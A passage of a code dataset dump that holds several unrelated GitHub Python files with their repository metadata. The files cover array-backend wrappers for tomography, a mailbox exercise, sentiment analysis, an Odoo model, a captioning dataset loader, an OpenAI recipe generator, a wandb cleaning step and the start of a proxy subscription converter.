normalize=normalize)\n h_real, h_imag = fft2(h_real, h_imag, override_backend=backend, normalize=normalize)\n fh_real = f_real * h_real - f_imag * h_imag\n fh_imag = f_real * h_imag + f_imag * h_real\n return ifft2(fh_real, fh_imag, override_backend=backend, normalize=normalize)\n\n\n@set_bn\ndef complex_mul(a_real, a_imag, b_real, b_imag, backend='autograd'):\n return (a_real * b_real - a_imag * b_imag, a_real * b_imag + a_imag * b_real)\n\n\n@set_bn\ndef fftshift(var, axes=(1, 2), backend='autograd'):\n \"\"\"\n :param var: [N, H, W, 2], where the last dimension represents real and imaginary parts.\n \"\"\"\n if backend == 'autograd':\n return anp.fft.fftshift(var, axes=axes)\n elif backend == 'pytorch':\n s = var.shape\n for i in axes:\n p2 = (s[i] + 1) // 2\n v = tc.split(var, p2, dim=i)\n if len(v) == 3:\n v1, v2 = (v[0], tc.cat([v[1], v[2]], dim=i))\n else:\n v1, v2 = v\n var = tc.cat([v2, v1], dim=i)\n return var\n\n\n@set_bn\ndef ifftshift(var, axes=(1, 2), backend='autograd'):\n \"\"\"\n :param var: [N, H, W, 2], where the last dimension represents real and imaginary parts.\n \"\"\"\n if backend == 'autograd':\n return anp.fft.ifftshift(var, axes=axes)\n elif backend == 'pytorch':\n s = var.shape\n for i in axes:\n p2 = s[i] - (s[i] + 1) // 2\n v = tc.split(var, p2, dim=i)\n if len(v) == 3:\n v1, v2 = (v[0], tc.cat([v[1], v[2]], dim=i))\n else:\n v1, v2 = v\n var = tc.cat([v2, v1], dim=i)\n return var\n\n\n@set_bn\ndef split_channel(var, backend='autograd'):\n if backend == 'autograd':\n var0, var1 = anp.split(var, var.shape[-1], axis=-1)\n slicer = [slice(None)] * (var.ndim - 1) + [0]\n return var0[tuple(slicer)], var1[tuple(slicer)]\n elif backend == 'pytorch':\n var0, var1 = tc.split(var, 1, dim=-1)\n slicer = [slice(None)] * (var.ndim - 1) + [0] #this removes the last singleton dimension...\n return var0[tuple(slicer)], var1[tuple(slicer)]\n \n@set_bn\ndef clip(var, a1, a2, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['clip'][backend])\n if backend == 'pytorch':\n if not isinstance(var, tc.Tensor):\n var = tc.tensor(var)\n arr = func(var, a1, a2)\n return arr\n\n\n@set_bn\ndef reshape(var, newshape, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['reshape'][backend])\n arr = func(var, newshape)\n return arr\n\n\n@set_bn\ndef floor(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['floor'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef floor_and_cast(var, dtype='int32', backend='autograd'):\n return cast(floor(var, override_backend=backend), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef ceil(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['ceil'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef ceil_and_cast(var, dtype='int32', backend='autograd'):\n return cast(ceil(var, override_backend=backend), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef sqrt(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['sqrt'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef mean(var, axis=None, backend='autograd'):\n args = {}\n if backend == 'autograd':\n if axis is not None:\n args['axis'] = axis\n return anp.mean(var, **args)\n elif backend == 'pytorch':\n if axis is not None:\n args['dim'] = axis\n return tc.mean(var, **args)\n\n\n@set_bn\ndef std(var, backend='autograd'):\n if backend == 'autograd':\n return anp.std(var)\n elif backend == 'pytorch':\n return tc.std(var)\n\n\n@set_bn\ndef max(var, return_number=True, axis=None, backend='autograd'):\n if backend == 'autograd':\n a = anp.max(var, axis=axis)\n elif backend == 'pytorch':\n if axis is None:\n a = tc.max(var)\n if return_number:\n a = float(to_numpy(a))\n else:\n a = tc.max(var, dim=axis)\n return a\n\n\n@set_bn\ndef min(var, return_number=True, axis=None, backend='autograd'):\n if backend == 'autograd':\n a = anp.min(var, axis=axis)\n elif backend == 'pytorch':\n if axis is None:\n a = tc.min(var)\n if return_number:\n a = float(to_numpy(a))\n else:\n a = tc.min(var, dim=axis)\n return a\n\n\n@set_bn\ndef real(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['real'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef imag(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['imag'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef tile(var, cp, backend='autograd'):\n if backend == 'autograd':\n return anp.tile(var, cp)\n elif backend == 'pytorch':\n return var.repeat(*cp)\n\n\n@set_bn\ndef repeat(var, cp, axis=None, backend='autograd'):\n if backend == 'autograd':\n return anp.repeat(var, cp, axis=axis)\n elif backend == 'pytorch':\n return tc.repeat_interleave(var, cp, dim=axis)\n\n\n@set_bn\ndef flip(var, axis=[0], backend='autograd'):\n if backend == 'autograd':\n return anp.flip(var, axis=axis)\n elif backend == 'pytorch':\n try:\n _ = len(axis)\n return tc.flip(var, dims=axis)\n except:\n return tc.flip(var, dims=[axis])\n\n\n@set_bn\ndef pad(var, pad_len, mode='constant', constant_values=0, backend='autograd'):\n \"\"\"\n Pad array.\n [ATTENTION: The behavior of this function is different between Autograd and Pytorch backend.]\n\n :param pad_len: A tuple of tuples. Consistent with the format of numpy.pad.\n :param mode: Choose from 'constant', 'reflect'.\n \"\"\"\n args = {}\n mode_dict = {'constant': {'autograd': 'constant', 'pytorch': 'constant'},\n 'edge': {'autograd': 'edge', 'pytorch': 'replicate'},\n 'reflect': {'autograd': 'reflect', 'pytorch': 'reflect'},\n 'wrap': {'autograd': 'wrap', 'pytorch': 'circular'}}\n if mode == 'constant':\n args['constant_values'] = 0\n if backend == 'autograd':\n return anp.pad(var, pad_len, mode=mode_dict[mode][backend], **args)\n elif backend == 'pytorch':\n pad_len = [x for y in pad_len[::-1] for x in y]\n return tc.nn.functional.pad(var, pad_len, mode=mode_dict[mode][backend], value=constant_values)\n elif backend == 'numpy':\n return np.pad(var, pad_len, mode=mode, **args)\n\n\n@set_bn\ndef sum(var, axis=None, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['sum'][backend])\n if backend == 'autograd':\n arr = func(var, axis=axis)\n elif backend == 'pytorch':\n if axis is None:\n arr = tc.sum(var)\n else:\n arr = tc.sum(var, dim=axis)\n return arr\n\n\n@set_bn\ndef prod(var, axis=None, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['prod'][backend])\n if backend == 'autograd':\n args = {}\n if axis is not None:\n args['axis'] = axis\n arr = func(var, **args)\n elif backend == 'pytorch':\n args = {}\n if axis is not None:\n args['dim'] = axis\n arr = tc.prod(var, **args)\n return arr\n\n\n@set_bn\ndef roll(var, shifts, axes=0, backend='autograd'):\n if backend == 'autograd':\n return anp.roll(var, shifts, axis=axes)\n elif backend == 'pytorch':\n return tc.roll(var, shifts, dims=axes)\n\n\n@set_bn\ndef arctan2(var1, var2, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['arctan2'][backend])\n arr = func(var1, var2)\n return arr\n\n\n@set_bn\ndef nonzero(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['nonzero'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef norm(var_real, var_imag, backend='autograd'):\n if backend == 'autograd':\n return abs(var_real + 1j * var_imag)\n elif backend == 'pytorch':\n return tc.norm(tc.stack([var_real, var_imag], dim=0), dim=0)\n\n\n@set_bn\ndef vec_norm(arr, backend='autograd'):\n if backend == 'autograd':\n return anp.sqrt(anp.sum(abs(arr ** 2)))\n elif backend == 'pytorch':\n return tc.sqrt(tc.sum(arr ** 2))\n\n\n@set_bn\ndef swap_axes(arr, axes=(0, 1), backend='autograd'):\n if backend == 'autograd':\n temp = [*axes]\n if axes[0] < axes[1]:\n temp = [axes[1], axes[0]]\n axes = []\n for i in range(len(arr.shape)):\n if i == temp[0]:\n axes.append(temp[1])\n elif i == temp[1]:\n axes.append(temp[0])\n else:\n axes.append(i)\n return anp.transpose(arr, axes)\n elif backend == 'pytorch':\n return tc.transpose(arr, axes[0], axes[1])\n\n\n@set_bn\ndef permute_axes(arr, axes_order, backend='autograd'):\n if backend == 'autograd':\n return anp.transpose(arr, axes_order)\n elif backend == 'pytorch':\n return arr.permute(axes_order)\n\n\n@set_bn\ndef grid_sample(arr, grid, interpolation='bilinear', axis=0, device=None, backend='autograd'):\n \"\"\"\n :param arr: a stack of 2D images in [N, H, W, C].\n :param grid: [N, 2].\n \"\"\"\n assert flag_pytorch_avail, 'Wrapper function grid_sample requires Pytorch.'\n flag_convert_arr = False\n if not isinstance(arr, tc.Tensor):\n flag_convert_arr = True\n arr = tc.tensor(arr, requires_grad=False, device=device)\n if not isinstance(grid, tc.Tensor):\n grid = tc.tensor(grid, requires_grad=False, device=device)\n # x coordinates comes first in torch.grid_sample.\n grid = tc.flip(grid, (1,))\n\n axis_arrangement = [0, 1, 2, 3]\n # Move channel to the 2nd dimension.\n axis_arrangement[1], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[1]\n # Move invariant axis to front.\n if axis != 0:\n q = axis_arrangement.index(axis)\n axis_arrangement[0], axis_arrangement[q] = axis_arrangement[q], axis_arrangement[0]\n if axis_arrangement[2] > axis_arrangement[3]:\n axis_arrangement[2], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[2]\n arr = permute_axes(arr, axis_arrangement, override_backend='pytorch')\n\n # Convert grid to [-1, 1] scale.\n # arr_center = (tc.tensor(arr.shape[2:4], requires_grad=False, device=device) - 1) / 2\n # grid = (grid - arr_center) / (arr_center + 0.5)\n arr_shape = create_constant(arr.shape[2:], dtype=pytorch_dtype_query_mapping_dict[arr.dtype],\n device=get_var_device(arr))\n grid = -1 + 2. * grid / arr_shape + 1. / arr_shape\n\n grid = reshape(grid, [1, *arr.shape[2:4], 2], override_backend='pytorch')\n grid = tile(grid, [arr.shape[0], 1, 1, 1], override_backend='pytorch')\n grid = cast(grid, pytorch_dtype_query_mapping_dict[arr.dtype], override_backend='pytorch')\n arr = tc.nn.functional.grid_sample(arr, grid, padding_mode='border', mode=interpolation, align_corners=False)\n arr = permute_axes(arr, [axis_arrangement.index(0), axis_arrangement.index(1),\n axis_arrangement.index(2), axis_arrangement.index(3)], override_backend='pytorch')\n if flag_convert_arr:\n arr = arr.data.numpy()\n return arr\n\n\n@set_bn\ndef matmul(a, b, backend='autograd'):\n if backend == 'autograd':\n return anp.matmul(a, b)\n elif backend == 'pytorch':\n return tc.matmul(a, b)\n\n\n@set_bn\ndef affine_transform(arr, transform, backend='autograd'):\n \"\"\"\n :param arr: a stack of 2D images in [N, H, W].\n :param transform: A [2, 3] matrix for affine transform.\n \"\"\"\n if backend == 'autograd':\n raise NotImplementedError('Rescaling in Autograd is not yet implemented. Use Pytorch backend instead.')\n elif backend == 'pytorch':\n n = arr.shape[0]\n arr_size = arr.shape[1:]\n m = reshape(transform, [-1, 2, 3], override_backend=backend)\n m = cast(tile(m, [n, 1, 1], override_backend=backend), pytorch_dtype_query_mapping_dict[arr.dtype], override_backend=backend)\n g = tc.nn.functional.affine_grid(m, [n, 1, *arr_size])\n arr_new = tc.reshape(arr, [n, 1, *arr.shape[1:]])\n arr_new = tc.nn.functional.grid_sample(arr_new, g, padding_mode='border')\n return arr_new[:, 0, :, :]\n\n\n@set_bn\ndef rotate(arr, theta, axis=0, backend='autograd', device=None):\n \"\"\"\n A rotate function that allows taking gradient with regards to theta.\n\n :param arr: a 3D object in [len_y, len_x, len_z, n_channels].\n \"\"\"\n if backend == 'autograd':\n warnings.warn('Rotate (with grad) in Autograd is not yet implemented. Use Pytorch backend instead.')\n axes = []\n for i in range(3):\n if i != axis:\n axes.append(i)\n return scipy.ndimage.rotate(arr, -anp.rad2deg(theta), reshape=False, axes=axes, mode='nearest', order=1)\n elif backend == 'pytorch':\n try:\n theta = theta.view(1)\n except:\n theta = tc.tensor(theta, requires_grad=False, device=device)\n theta = theta.view(1)\n axis_arrangement = [0, 1, 2, 3]\n # Move channel to the 2nd dimension.\n axis_arrangement[1], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[1]\n # Move invariant axis to front.\n if axis != 0:\n q = axis_arrangement.index(axis)\n axis_arrangement[0], axis_arrangement[q] = axis_arrangement[q], axis_arrangement[0]\n if axis_arrangement[2] < axis_arrangement[3]:\n theta = -theta\n arr = permute_axes(arr, axis_arrangement, override_backend='pytorch')\n naught = cast(tc.tensor([0.], device=device), pytorch_dtype_query_mapping_dict[theta.dtype], override_backend='pytorch')\n m0 = tc.cat([tc.cos(theta), -tc.sin(theta), naught])\n m1 = tc.cat([tc.sin(theta), tc.cos(theta), naught])\n m = tc.stack([m0, m1]).view(1, 2, 3)\n m = cast(tile(m, [arr.shape[0], 1, 1], override_backend='pytorch'), pytorch_dtype_query_mapping_dict[arr.dtype], override_backend='pytorch')\n g = tc.nn.functional.affine_grid(m, arr.shape, align_corners=False)\n\n arr = tc.nn.functional.grid_sample(arr, g, padding_mode='border', align_corners=False)\n arr = permute_axes(arr, [axis_arrangement.index(0), axis_arrangement.index(1),\n axis_arrangement.index(2), axis_arrangement.index(3)], override_backend='pytorch')\n return arr\n\n\n@set_bn\ndef pcc(obj, backend='autograd'):\n \"\"\"\n Calculate the Pearson correlation coefficient of images in an array along the last dimension.\n :param obj: Tensor. \n :return: Pearson correlation coefficient.\n \"\"\"\n slicer_z = [slice(None)] * (len(obj.shape) - 1)\n for i_slice in range(obj.shape[-1]):\n if i_slice == 0:\n nom = obj[slicer_z + [i_slice]] - mean(obj[slicer_z + [i_slice]])\n denom = std(obj[slicer_z + [i_slice]])\n else:\n nom = nom * (obj[slicer_z + [i_slice]] - mean(obj[slicer_z + [i_slice]]))\n denom = denom * std(obj[slicer_z + [i_slice]])\n nom = sum(nom)\n return abs(nom / denom)\n\n\n@set_bn\ndef tomography_filter(arr, axis=2, filter_type='hamming', backend='autograd'):\n \"\"\"\n Apply a 1D ramp filter needed for tomography reconstruction.\n\n :param arr: Data array.\n :param axis: Axis of slice projection.\n :return:\n \"\"\"\n func = getattr(scipy.signal.windows, filter_type)\n filter = func(arr.shape[axis])\n if axis != len(arr.shape) - 1:\n arr = swap_axes(arr, [axis, len(arr.shape) - 1])\n if backend == 'pytorch':\n args = {'device': arr.device}\n else:\n args = {}\n arr_r, arr_i = fft(arr, zeros_like(arr, requires_grad=False, **args))\n arr_r = arr_r * filter\n arr_i = arr_i * filter\n arr, _ = ifft(arr_r, arr_i)\n if axis != len(arr.shape) - 1:\n arr = swap_axes(arr, [axis, len(arr.shape) - 1])\n return arr\n\n\n@set_bn\ndef argmax(arr, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['argmax'][backend])\n arr = func(arr)\n return arr\n\n\n@set_bn\ndef tensordot(a, b, axes=None, backend='autograd'):\n \"\"\"\n :param axes: Comply to Numpy format.\n \"\"\"\n dims = axes\n if backend == 'pytorch':\n if isinstance(axes, (list, tuple)):\n if isinstance(axes[0], int):\n dims = []\n for i in axes:\n dims.append((axes[i],))\n return tc.tensordot(a, b, dims=dims)\n elif backend == 'autograd':\n return anp.tensordot(a, b, axes=dims)\n\n\n@set_bn\ndef isnan(arr, backend='autograd'):\n if backend == 'pytorch':\n return tc.isnan(arr)\n elif backend == 'autograd':\n return anp.isnan(arr)\n","repo_name":"mdw771/adorym","sub_path":"adorym/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":42812,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"} +{"seq_id":"11224370798","text":"# file_name = input(\"Enter a file name: \")\nfile_name = \"mbox-short.txt\"\nf = open(file_name)\ntry:\n f = open(file_name)\nexcept FileNotFoundError as e:\n print('File can\\'t be opened: '+file_name)\n exit(0)\n\ncount = {}\nfor line in f.readlines():\n words = line.split()\n if len(words) < 3 or words[0] != \"From\":\n continue\n day = words[2]\n if day not in count:\n count[day] = 0\n count[day] += 1\n\nprint(count)\n","repo_name":"murtraja/p4e-exercises","sub_path":"ch9-dict/e2_day_count.py","file_name":"e2_day_count.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"233703369","text":"from nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport nltk\nnltk.download('vader_lexicon')\n\ndef sentimentCheck(string):\n sid = SentimentIntensityAnalyzer()\n score = sid.polarity_scores(string)\n result = \"Neutral\"\n neutralCheck1 = score[\"neu\"] - score[\"neg\"]\n neutralCheck2 = score[\"neu\"] - score[\"pos\"]\n if score[\"neu\"] > score[\"pos\"] and score[\"neu\"] > score[\"neg\"] and neutralCheck1 >= 0.16 and neutralCheck2 >= 0.16 and score[\"neg\"] < 0.42 and score[\"pos\"] < 0.42:\n result = \"Neutral\"\n elif score[\"neg\"] > score[\"pos\"] and neutralCheck1 <= 0.16:\n result = \"Negative\"\n elif score[\"pos\"] > score[\"neg\"] and neutralCheck2 <= 0.16:\n result = \"Positive\"\n else:\n result = \"Neutral\"\n #print(score)\n return result\n\n#result = sentimentCheck(\"neutral\")\n#print(result)\n\nimport dill as pickle\nwith open('sentiment.pkl', 'wb') as file:\n pickle.dump(sentimentCheck, file)","repo_name":"abduls22/NLP-sentiment-analysis","sub_path":"model/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2716828917","text":"from odoo import fields, models\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n #manual_status = fields.Boolean(\"manual_status\",)\n\n manual_status = fields.Selection([\n ('consu', 'Consumable'),\n ('consu', 'Consumable'),\n ('service', 'Service')], string='Product Type', default='consu', required=True,\n help='A storable product is a product for which you manage stock. The Inventory app has to be installed.\\n'\n 'A consumable product is a product for which stock is not managed.\\n'\n 'A service is a non-material product you provide.')","repo_name":"kanda999/project-oca","sub_path":"sale_manual_status/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70959917630","text":"import json\r\nimport torch\r\nimport os.path as osp\r\nimport random\r\nfrom datasets import load_dataset\r\nfrom .utils import pre_captions, img_hash_to_addr, collate_test_set, image_transform\r\n\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset\r\n\r\n\r\nclass Personality_Captions(Dataset):\r\n def __init__(self, dataset, preprocessor, config:dict, pretrain:bool=False, **kwargs):\r\n super().__init__()\r\n # config: at least contains keys of [\"style_dict\", \"pfx_len\", \"img_addr\", \"img_attr\"]\r\n with open(config[\"style_dict\"]) as f:\r\n self.style_dict=json.load(f)[\"items\"]\r\n self.pfx_len=config[\"prefix_len\"]\r\n self.n_cls=config[\"n_cls\"]\r\n assert len(self.style_dict)==self.n_cls, \\\r\n \"Style number from the dict does not match that of config file. \\\r\n Got {} and {} respectively.\".format(len(self.style_dict),self.n_cls)\r\n\r\n # preprocessor: BlipPreprocessor\r\n self.preprocessor=preprocessor\r\n # dataset: load from datasets.load_dataset\r\n self.dataset=dataset\r\n # merge additional column into \"comment\"\r\n if \"additional_comments\" in self.dataset.column_names:\r\n self.dataset=self.dataset.map(collate_test_set, batch_size=128)\r\n\r\n # prefix ids w.r.o styles\r\n # n_cls=216, with the last being unk\r\n self.pfx_ids=torch.arange(0, self.n_cls*self.pfx_len)\\\r\n .view(-1,self.pfx_len).contiguous()\r\n \r\n self.img_addr=config[\"img_path\"]\r\n self.img_name_fmt=\"{}%s\"%(config[\"img_attr\"])\r\n\r\n # others\r\n self.image_size=config[\"image_size\"]\r\n self.split=config[\"split\"]\r\n self.max_len=config.get(\"max_len\", 30)\r\n # pretrain now only available for train split\r\n self.pretrain=pretrain and self.split==\"train\"\r\n\r\n def __getitem__(self, index):\r\n # 对于单int提取的情况则升维\r\n squeeze_list=False\r\n if isinstance(index, int):\r\n squeeze_list=True\r\n index=[index]\r\n\r\n is_train=(self.split==\"train\")\r\n item=img_hash_to_addr(self.dataset[index], self.img_addr, self.img_name_fmt)\r\n if is_train:\r\n imgs=image_transform(item[\"images\"], self.image_size)\r\n else:\r\n imgs=[Image.open(img).convert(\"RGB\") for img in item[\"images\"]]\r\n\r\n texts=pre_captions(item[\"comment\"], self.max_len)\r\n\r\n processed=self.preprocessor(images=imgs, \r\n text=texts if self.split!=\"test\" else None,\r\n padding=\"max_length\",\r\n max_length=min(512-self.pfx_len, self.max_len*3),\r\n return_tensors=\"pt\")\r\n \r\n if self.pretrain:\r\n neg_caps, neg_style_ids=self.__get_neg_example(item)\r\n processed_negs=self.preprocessor(images=None,\r\n text=neg_caps,\r\n padding=\"max_length\",\r\n max_length=min(512-self.pfx_len, self.max_len*3),\r\n return_tensors=\"pt\")\r\n\r\n processed[\"neg_input_ids\"]=processed_negs.pop(\"input_ids\")\r\n processed[\"neg_attention_mask\"]=processed_negs.pop(\"attention_mask\")\r\n processed[\"neg_prefix_ids\"]=self.pfx_ids[neg_style_ids,:]\r\n\r\n # insert style pfxs\r\n style_ids=list(map(lambda x:self.style_dict.get(x, self.n_cls-1), item[\"personality\"]))\r\n # print(style_ids)\r\n processed[\"prefix_ids\"]=self.pfx_ids[style_ids,:]\r\n\r\n \r\n processed={k:v.squeeze(0) for k,v in processed.items()}\r\n if not is_train:\r\n # squeeze the sequence\r\n texts=texts[0] if squeeze_list else texts\r\n processed.update({\"comment\": texts})\r\n\r\n # \"comment\" in output is like [(comment_0~(batch-1)[0],...),(comment_batch[1],...),...]\r\n # and we desire [(comment_0[0~4]), (comment_1[0~4])]\r\n # so remember to zip it\r\n return processed\r\n\r\n def __get_neg_example(self, item):\r\n # select one negative cap from negative caps\r\n neg_caps=[random.choice(x) for x in item[\"negative_caps\"]]\r\n neg_caps=pre_captions(neg_caps, self.max_len)\r\n # sample a different style for each item\r\n gts_styles=[self.style_dict.get(x, self.n_cls-1) for x in item[\"personality\"]]\r\n neg_style_ids=[]\r\n for item in gts_styles:\r\n while True:\r\n neg_item=random.randint(0, self.n_cls-2)\r\n if neg_item != item:\r\n neg_style_ids.append(neg_item)\r\n break\r\n \r\n return neg_caps, neg_style_ids\r\n \r\n def __len__(self):\r\n return len(self.dataset)\r\n\r\ndef build_pcap_dataset(config, preprocessor, device=\"cpu\", split=\"train\", slice:str=\"\"):\r\n '''\r\n load PCap dataset\r\n\r\n args:\r\n - config: ConCap.config\r\n - preprocessor, device\r\n - split: must be one of [\"train\", \"test\", \"(e)val\"]\r\n - slice: str with format of \"[a:b]\"\r\n \r\n '''\r\n print(\"\\n-------dataset loading-------\")\r\n split=split.lower()\r\n if split==\"eval\":\r\n split=\"val\"\r\n if split not in [\"pretrain\", \"train\", \"test\", \"val\"]:\r\n raise KeyError(\"dataset split must be [\\\"train\\\", \\\"test\\\", \\\"(e)val\\\"]\")\r\n \r\n copy_keys=[\"prefix_len\", \"n_cls\", \"max_len\"]\r\n pretrain=(split==\"pretrain\")\r\n # load dataset conf\r\n ds_conf={\r\n **config[\"dataset\"],\r\n **{k: config[\"text_model\"][k] for k in copy_keys},\r\n \"image_size\": config[\"vision_model\"].get(\"image_size\", 384),\r\n \"split\": \"train\" if pretrain else split\r\n }\r\n \r\n ds_file=osp.join(ds_conf[\"dataset_path\"],ds_conf[\"{}_json\".format(ds_conf[\"split\"])])\r\n dataset=load_dataset(\"json\", data_files=ds_file, split=\"train{}\".format(slice))\r\n # we need config.\r\n tgt_dataset=Personality_Captions(dataset, preprocessor, config=ds_conf, pretrain=pretrain)\r\n \r\n print(\"\\nLoad {} split from {}\".format(split, ds_file))\r\n if slice != \"\":\r\n print(\"Slice: {}\".format(slice))\r\n print(\"Length: {}\".format(len(tgt_dataset)))\r\n print(\"-------dataset load done-------\")\r\n\r\n return tgt_dataset\r\n\r\n\r\n\r\n","repo_name":"wdr-RA02/Controllable_Cap_new","sub_path":"data/pcap_dataset.py","file_name":"pcap_dataset.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28680017586","text":"'''\nAdam Forestier\nJune 21, 2023\nTakes in ingredients and returns recipe and image of recipe\n'''\n\nimport openai\nimport re\nimport requests\nimport shutil\n\nfrom key import key as openai_key\n\nopenai.api_key = openai_key\n\ndef create_dish_prompt(ingredients: list) -> str:\n '''\n arguments: list of ingredents\n returns: prompt to send to \n descriptioN: create_dish_prompt creates prompt to send to api based on recipe list\n '''\n prompt = f\"Create a detailed recipe based only on only the following ingredients. Here is the list of ingredents: {', '.join(ingredients)}. Additionally, assign a title starting with 'Recipe Title: ' to this recipe.\"\n return prompt\n\ndef extract_recipe_title(recipe: str) -> str:\n '''\n arguments: recipe text\n returns: the name of the recipe\n description: extract_recipe_title returns the title of the dish\n '''\n title = re.findall(\"^.*Recipe Title: .*$\", recipe, re.MULTILINE)[0].strip().split(\"Recipe Title: \")[1]\n return title\n\ndef save_img(img_response, file_name) -> int:\n '''\n arguments: response from api\n returns: status code\n description: save_img downloads the image that api has created\n '''\n img_url = img_response['data'][0]['url']\n img_results = requests.get(img_url, stream=True)\n if img_results.status_code == 200:\n with open(file_name, 'wb') as f:\n shutil.copyfileobj(img_results.raw, f)\n else:\n print('ERROR LOADING IMAGE')\n return img_results.status_code\n\ni = ['ground turkey', 'zucchini', 'tomatoes', 'rice']\n\nresponse = openai.Completion.create(\n model='text-davinci-003',\n prompt=create_dish_prompt(ingredients=i),\n max_tokens=512,\n temperature=.7\n)\n\n# The recipe\nrecipe_text = response['choices'][0]['text']\nprint(recipe_text)\n\n# get recipe title to generate photo\nrecipe_title = extract_recipe_title(recipe=recipe_text)\n\n# Create image\nimg_response = openai.Image.create(\n prompt=recipe_title,\n n=1,\n size='256x256'\n)\n\n# Save image\nsave_img(img_response=img_response, file_name='recipe_photo.png')","repo_name":"atfb10/OpenAI-API-Course","sub_path":"course/recipe_creator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42732165941","text":"#!/usr/bin/env python\n\nimport logging\nimport pandas as pd\nimport wandb\nimport os\nimport hydra\nfrom omegaconf import DictConfig\n\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n@hydra.main(config_name='config')\ndef go(config: DictConfig):\n\n wandb.login(key=config['wandb']['api_key'])\n run = wandb.init(project=config['wandb']['project'], job_type=config['wandb']['job_type'])\n\n logger.info(\"Reading artifact\")\n df = pd.read_parquet(config['artifact']['path'])\n\n # Drop the duplicates\n logger.info(\"Dropping duplicates\")\n df = df.drop_duplicates().reset_index(drop=True)\n\n logger.info(\"Fixing missing values\")\n # These are missing values that are due to an old version of the data. On new data,\n # because of a change in the web form used to register new songs, the title and the\n # song name are already empty strings\n df['title'].fillna(value='', inplace=True)\n df['song_name'].fillna(value='', inplace=True)\n df['text_feature'] = df['title'] + ' ' + df['song_name']\n\n filename = \"processed_data.csv\"\n df.to_csv(filename)\n\n artifact = wandb.Artifact(\n name=config['artifact']['name'],\n type=config['artifact']['type'],\n description=config['artifact']['description'],\n )\n artifact.add_file(filename)\n\n logger.info(\"Logging artifact\")\n run.log_artifact(artifact)\n\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"AndreaCaliandro/mlops","sub_path":"lesson-2-data-exploration-and-preparation/exercises/exercise_5/starter/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12736215519","text":"#!/usr/bin/env python3\n\nimport re, yaml, json, base64\nimport requests, socket, urllib.parse\nfrom requests.adapters import HTTPAdapter\n\nimport geoip2.database\n\nclass convert():\n\n def main(raw_input, input_type='url', output_type='url', custom_set={'dup_rm_enabled': False, 'format_name_enabled': False}): # {'input_type': ['url', 'content'],'output_type': ['url', 'YAML', 'Base64']}\n \"\"\"Convert subscribe content to YAML or Base64 or url.\n 首先获取到订阅内容,然后对其进行格式化处理。如果内容不是 “订阅内容解析错误”,在进行去重、改名操作后(可选)输出目标格式,否则输出 “订阅内容解析错误”。\n \"\"\"\n if input_type == 'url': # 获取 URL 订阅链接内容\n sub_content = ''\n if isinstance(raw_input, list):\n a_content = []\n for url in raw_input:\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=5))\n s.mount('https://', HTTPAdapter(max_retries=5))\n try:\n print('Downloading from:' + url)\n resp = s.get(url, timeout=5)\n s_content = convert.yaml_decode(convert.format(resp.content.decode('utf-8')))\n a_content.append(s_content)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n sub_content = convert.format(''.join(a_content))\n else:\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=5))\n s.mount('https://', HTTPAdapter(max_retries=5))\n try:\n print('Downloading from:' + raw_input)\n resp = s.get(raw_input, timeout=5)\n sub_content = convert.format(resp.content.decode('utf-8'))\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n elif input_type == 'content': # 解析订阅内容\n sub_content = convert.format(raw_input)\n\n if sub_content != '订阅内容解析错误':\n dup_rm_enabled = custom_set['dup_rm_enabled']\n format_name_enabled = custom_set['format_name_enabled']\n final_content = convert.makeup(sub_content,dup_rm_enabled,format_name_enabled)\n if output_type == 'YAML':\n return final_content\n elif output_type == 'Base64':\n return convert.base64_encode(convert.yaml_decode(final_content))\n elif output_type == 'url':\n return 